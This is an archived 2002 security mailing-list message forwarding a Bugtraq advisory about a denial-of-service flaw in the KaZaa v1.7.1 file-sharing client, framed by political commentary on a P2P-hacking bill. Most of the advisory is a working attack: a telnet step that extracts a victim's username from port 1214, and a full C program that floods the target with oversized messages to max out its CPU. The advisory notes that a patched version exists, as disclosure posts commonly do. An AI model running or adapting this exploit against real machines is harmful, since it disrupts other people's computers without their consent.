[ISN] FC: Just in time for P2P-hacking bill: Disrupting KaZaa clients

From: InfoSec News (isnat_private)
Date: Fri Jul 26 2002 - 02:01:09 PDT

  • Next message: InfoSec News: "[ISN] Deal struck for security alerts"

    ---------- Forwarded message ----------
    Date: Fri, 26 Jul 2002 01:56:07 -0400
    From: Declan McCullagh <declanat_private>
    To: politechat_private
    Subject: FC: Just in time for P2P-hacking bill: Disrupting KaZaa clients
    
    Previous Politech message:
    
    "Peer-to-peer hacking bill officially introduced in House"
    http://www.politechbot.com/p-03795.html
    
    ---
    
    From: "Richard M. Smith" <rmsat_private>
    To: <declanat_private>
    Subject: Just in time for the Berman bill!
    Date: Thu, 25 Jul 2002 20:46:38 -0400
    
    
    FYI:
    
    -----Original Message-----
    From: joshat_private [mailto:joshat_private]
    Sent: Thursday, July 25, 2002 1:58 AM
    To: bugtraqat_private
    Subject: KaZaa v1.7.1 Denial of Service Attack
    
    
    Submitted by  : Josh (joshat_private), omega
                     (mtwoarat_private) on July 25th, 2002
    Vulnerability : KaZaa Denial of Service Attack
    Tested On     : KaZaa v1.7.1
    Remote        : Yes
    Fix           : KaZaa v1.7.2 has been released and is a fix for the
                     problem
    Big Thanks To : SooT for letting me crash your system a lot.
    Greets to     : SooT, zen-parse, arcanum, lockdown, brian, Bryan S.,
    #social on ptp, Jade
    
    	There exists a denial of service attack in KaZaa Media Desktop
    file sharing utility that allows an attacker to force CPU usage to
    rise to 100% upon sending large messages to the victim.  Basically it
    seems to have the same effect as opening an exceptionally large text
    file in some text editor.  The added bonus is the decryption that is
    performed on the message, which adds to the CPU usage.
    
    	Exploitation merely requires the I.P. of the victim and a
    username.  The username
    can be obtained as such:
    
    $ telnet <ip> 1214
    Trying <ip>...
    Connected to <ip>.
    Escape character is '^]'.
    GET / HTTP/1.1                                 // My input
    
    HTTP/1.0 404 Not Found                         // Server output
    X-Kazaa-Username: <the user name of the user>
    X-Kazaa-Network: KaZaA
    X-Kazaa-IP: <the_ip_you_typed>:1214
    X-Kazaa-SupernodeIP: <censored>:1214
    
    Connection closed by foreign host.
    
    Assuming you and the receiving user have the bandwidth to transmit and
    receive the message before the connection to the user's kazaa server
    times out, a good proof of concept length is 20 messages at 100
    iterations of the 4026 byte message tell... 300 iterations 20 times
    will make it pretty evident.
    
    /*
        kazaa denial of service attack
        by Josh and omega
    */
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <errno.h>
    #include <string.h>
    #include <netdb.h>
    #include <sys/types.h>
    #include <netinet/in.h>
    #include <sys/socket.h>
    #include <stdarg.h>
    
    #define PORT 1214
    
    
    int main(int argc, char *argv[])
    {
        int fd, numbytes, randnum, k;
        struct hostent *host;
        struct sockaddr_in them;
        char buf2[4026];
        char buf[5000];
        char *bigboy;
        int i, size, j;
    
    
        memset(buf2, 'a', sizeof(buf2));
        buf2[sizeof(buf2)-1]='\0';
        srand(time(NULL));
    
        if (argc < 5)
        {
           fprintf(stderr,"usage: %s <hostname> <(this*4026) bytes per
    message> <username_of_target> <number_of_messages>\n", argv[0]);
           exit(1);
        }
        if ((host=gethostbyname(argv[1])) == NULL)
        {
           perror("gethostbyname");
           exit(1);
        }
    
        them.sin_family = AF_INET;
        them.sin_port = htons(PORT);
        them.sin_addr = *((struct in_addr *)host->h_addr);
        memset(&(them.sin_zero), '\0', 8);
    
    
        size=(4042*atoi(argv[2]))+280+1;
        bigboy=(char *)malloc(size);
    
        snprintf(bigboy, size, "GET /.message HTTP/1.1\nHost:
    68.10.112.148:1214\nUserAgent: KazaaClient Jan 18 2002
    18:53:21\nX-Kazaa-Username: 31337h4x0r\nX-Kazaa-Network:
    KaZaA\nX-Kazaa-IP: %d:1214\nX-Kazaa-SupernodeIP: %d:1214\nConnection:
    open\nX-Kazaa-IMTo: %s@KaZaA\nX-Kazaa-IMType: user_text\n", randnum,
    randnum, argv[3]);
    
        /* the msg appears as one msg to the receiver, but comes in intervals
    of 4096 bytes... */
        snprintf(buf, sizeof(buf), "X-Kazaa-IMData: %s\n", buf2);
        for(k=0;k<atoi(argv[2]);k++)
        {
           strcat(bigboy, buf);
           k++;
        }
        strcat(bigboy, "\r\n\r\n\r\n\r\n\r\n");
    
        fprintf(stdout, "done preparing packet... sending\n");
        for(i=0, k=0;i<atoi(argv[4]);i++)
        {
          if ((fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
          {
            perror("socket");
          }
          else
          {
            if (connect(fd, (struct sockaddr *)&them,sizeof(struct sockaddr))
    == -1)
            {
              perror("connect");
            }
            else
            {
              printf("sending %d message\n", k);
              write(fd, bigboy, strlen(bigboy));
              k++;
              close(fd);
            }
          }
        }
        fprintf(stdout, "\n%d out of %d attempted got through\n", k, i);
        free(bigboy);
        return 0;
    }
    
    
    
    <Just crap>
    
    Paranoia is simply an optimistic outlook on life.
    
    Organized people are just too lazy to look for stuff.
    
    Killer animals zap animals again in slimey sludge.  People yack when a
    root evades.
    
    While observing moths frantically try to enter a light bulb I have
    been able to extract and algorithm to describe their movements.
    
    Fat people are harder to kidnap.
    
    </Just crap>
    
    
    
    
    -------------------------------------------------------------------------
    POLITECH -- Declan McCullagh's politics and technology mailing list
    You may redistribute this message freely if you include this notice.
    To subscribe to Politech: http://www.politechbot.com/info/subscribe.html
    This message is archived at http://www.politechbot.com/
    Declan McCullagh's photographs are at http://www.mccullagh.org/
    -------------------------------------------------------------------------
    Like Politech? Make a donation here: http://www.politechbot.com/donate/
    -------------------------------------------------------------------------
    
    
    
    -
    ISN is currently hosted by Attrition.org
    
    To unsubscribe email majordomoat_private with 'unsubscribe isn'
    in the BODY of the mail.
    



    This archive was generated by hypermail 2b30 : Fri Jul 26 2002 - 04:32:31 PDT